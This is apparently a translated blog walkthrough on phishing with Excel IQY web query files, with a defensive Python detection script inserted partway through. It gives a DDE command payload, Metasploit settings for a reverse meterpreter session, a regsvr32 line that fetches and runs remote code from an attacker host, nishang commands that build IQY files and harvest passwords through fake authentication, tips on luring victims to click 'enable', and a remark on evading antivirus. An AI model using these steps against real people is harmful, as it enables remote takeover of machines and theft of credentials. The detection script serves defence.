IQY phishing in Excel

Time:2020-2-28


0x00 environment preparation

Operating system: Windows 7

Microsoft Office version: Office 2010

0x01 understand the basic concept of iqy

You can think of iqy as a special “web browser” (one that cannot load scripts) built into Excel. Through an iqy [i.e. Web Query] statement, you can easily import all kinds of tabular data from the web into the current Excel workbook. This is exactly what makes it possible to use Excel for phishing emails: if the web data being imported is a piece of malicious iqy payload code that an intruder has prepared in advance, the result is self-evident.

0x02 initial experience of using Excel iqy

1. Create a new Excel file, go to “data” -> “from website” -> “address”, fill in the URL of the website to grab data from, and select the table to grab (click the small yellow arrow)

 

 

2. Select the corresponding form, and then click Import

 

Click OK

 

Effect after successful import

 

3. Next, use iqy to pop the calculator and see the effect

3.1 Place a payload.html file in the web directory of our own server, containing the iqy code
IQY code:
=cmd|'/c calc.exe'!A0

 

Check that the file can be accessed normally

3.2 The next step is to pull the payload file from our own server using the same method as before

 

3.3 import

 

 

One more step to confirm

 

3.4 After all prompts are confirmed, the payload executes and the calculator pops up

 

0x03 get a meterpreter session with iqy

The additional tools needed for this step are as follows:

nishang: https://github.com/samratashok/nishang/releases

1. Prepare the MSF payload on the Kali attack machine

msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_rc4_dns
msf > set lhost 192.168.3.29
msf > set lport 53
msf > set rc4password secquan.org
msf > exploit -j

2. Generate the iqy file directly with the Out-WebQuery script provided in nishang

(The content of the iqy file itself is very simple. There is only one URL, pointing at the malicious payload: http://192.168.80.131/meter.html. The key is this HTML file. We need to replace its content with the iqy statement that loads the meterpreter payload we prepared above: regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll). The specific operations are as follows:

2.1 Execute the following command on the Windows 7 system used to make the phishing files
powershell -exec bypass -Command "& {Import-Module 'C:\tools\nishang\Client\Out-WebQuery.ps1';Out-WebQuery -URL http://192.168.80.131/meter.html}"

After the command is executed successfully, a new iqy file will be generated

 

 

 

2.2 Start our web server, create a meter.html file in the web root, and write into it the iqy code for the payload generated by MSF
# /etc/init.d/apache2 start
[ ok ] Starting apache2 (via systemctl)
# cd /var/www/html/
# vim meter.html
# cat meter.html
=cmd|'/c regsvr32 /s /n /u /i:http://192.168.80.131:8080/ZXMgstpzpYQCJ.sct scrobj.dll '!A0

 

 

3. The next step is to find a way to send the previously generated iqy file to the target user and have it executed

Under normal conditions, when it is double-clicked [Excel is called by default to open it], the following security warning box pops up. As for how to make him click “enable”, you need to think about it carefully

 

Because our iqy payload is executed through cmd, Excel will ask here whether you want to start cmd.exe. As long as the target clicks “yes”, our meterpreter session will come online normally, as follows

 

4. Go back to the attacker's Kali machine and see that the meterpreter session has been established successfully

 

0x04 steal target user password with iqy

1. Use the Out-WebQuery.ps1 script in the nishang tool to generate the iqy file, then start a web service locally with Start-CaptureServer.ps1

powershell -exec bypass -Command "& {Import-Module 'C:\tools\nishang\Client\Out-WebQuery.ps1'; Out-WebQuery -URL http://192.168.80.129/}"
C:\> powershell -exec bypass
PS C:\> cd C:\tools\nishang\Utility
PS C:\tools\nishang\Utility> Import-Module .\Start-CaptureServer.ps1
PS C:\tools\nishang\Utility> Start-CaptureServer -AuthType Basic -IPAddress 192.168.80.129 -LogFilePath C:\windows\temp\log.txt

Select Basic authentication. The monitored IP is consistent with the IP in the iqy file generated above, which is usually the local I

 

 

If running PS1 scripts is forbidden, first execute Set-ExecutionPolicy RemoteSigned

 

2. Send the generated iqy file to the target user, and entice him to click enable and enter the relevant password

Click enable

 

Entice the user to enter the account password

 

4. The account password entered by the target user is received; it was obtained successfully
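
Seen from the defending side, the files and responses used in sections 0x02 to 0x04 can be triaged mechanically before they reach a user. The following is an added example, not code from the original post or from nishang: it assumes the minimal IQY layout (a WEB line, a version line, then the URL), uses hypothetical function names (parse_iqy, url_findings, dde_findings, triage), and runs on sample strings constructed from the lab values above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# DDE-style formula: =app|'arguments'!cell, as in =cmd|'/c calc.exe'!A0
DDE_FORMULA = re.compile(r"[=+\-@]\s*(\w+)\s*\|\s*'([^']*)'\s*!\s*\w+")

def parse_iqy(text):
    """Return the query URL of an IQY file, or None if it is not one.
    Assumption: minimal layout is WEB / version / URL, one item per line."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines or lines[0].upper() != "WEB":
        return None
    for ln in lines[1:]:
        if ln.lower().startswith(("http://", "https://")):
            return ln
    return None

def url_findings(url):
    """Heuristic flags for the URL an IQY file points at."""
    parts = urlsplit(url)
    flags = []
    if parts.scheme == "http":
        flags.append("plain-http")          # credentials or data sent in clear
    try:
        ipaddress.ip_address(parts.hostname or "")
        flags.append("ip-literal-host")     # no domain name, just an address
    except ValueError:
        pass
    return flags

def dde_findings(body):
    """Return (application, arguments) for each DDE formula in a response body."""
    return [(m.group(1).lower(), m.group(2).strip()) for m in DDE_FORMULA.finditer(body)]

def triage(iqy_text, response_body):
    """Combine the file-level and response-level checks into one verdict record."""
    url = parse_iqy(iqy_text)
    return {"url": url, "url_flags": url_findings(url) if url else [],
            "dde": dde_findings(response_body)}

# Constructed samples mirroring the page's lab values
SAMPLE_IQY = "WEB\n1\nhttp://192.168.80.131/meter.html\n"
SAMPLE_BODY = "=cmd|'/c calc.exe'!A0\n"
BENIGN_BODY = "<table><tr><td>Q1</td><td>=SUM(A1:A3)</td></tr></table>\n"

if __name__ == "__main__":
    print(triage(SAMPLE_IQY, SAMPLE_BODY))
    print(triage(SAMPLE_IQY, BENIGN_BODY))
```

A mail gateway or proxy can apply parse_iqy to attachments and dde_findings to the content Excel would fetch; any non-empty "dde" result means the response asks Excel to start an external program.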

 

0x05 some notes on practical use

  • In actual use, generating the iqy directly with the Out-WebQuery.ps1 script is not flexible enough. If some normal data could be added to the iqy first, it would certainly look more realistic. I have tested this many times without success, and will update after finding a perfect solution later
  • Some AV products will detect this kind of attack, so AV evasion has to be taken care of

0x06 source

By klionsec, phishing with iqy features

 

 
